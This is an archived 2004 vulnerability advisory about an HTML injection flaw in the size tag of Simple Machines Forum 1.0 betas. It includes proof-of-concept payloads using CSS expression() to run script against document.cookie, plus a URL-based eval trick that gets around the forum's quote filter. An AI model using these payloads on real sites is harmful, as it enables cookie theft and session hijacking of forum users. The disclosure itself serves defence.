exploits , vulnerabilities , articles , Simple Machines Forum Size Tag HTML Injection Vulnerability

Title	Simple Machines Forum Size Tag HTML Injection Vulnerability
Published	2004-05-05-12:00AM
Updated	2004-05-05-07:52PM
Class	Input Validation Error
CVE	CVE-MAP-NOMATCH
Remote	Yes
Local	No
Credit	This vulnerability is credited to Cheng Peng Su <apple_soup@msn.com>.
Vulnerable	Simple Machines SMF 1.0 beta5p Simple Machines SMF 1.0 beta4p Simple Machines SMF 1.0 beta4.1
Not Vulnerable
Code	No exploit is required for this issue, however Cheng Peng Su <apple_soup@msn.com> provided some proof-of-concept code. An attacker could reportedly post content to the forums containing: [size=expression(alert(document.cookie))]Content[/size] With the limit that the forum software filters out quotes, apostrophes and semicolons. Another method that circumvents the software filtering would be to post content such as: [size=expression(eval(unescape(document.URL.substring(document.URL.length-34,document.URL.length))))]Content[/size] then get the victim to follow: http://www.example.com/index.php?topic=12345.0&alert('cookie: '+document.cookie) Where the '12345.0' is the topic containing the previously posted content. The victim's browser would execute the last 34 characters (as specified in the previously posted 'length-34' content).
TXT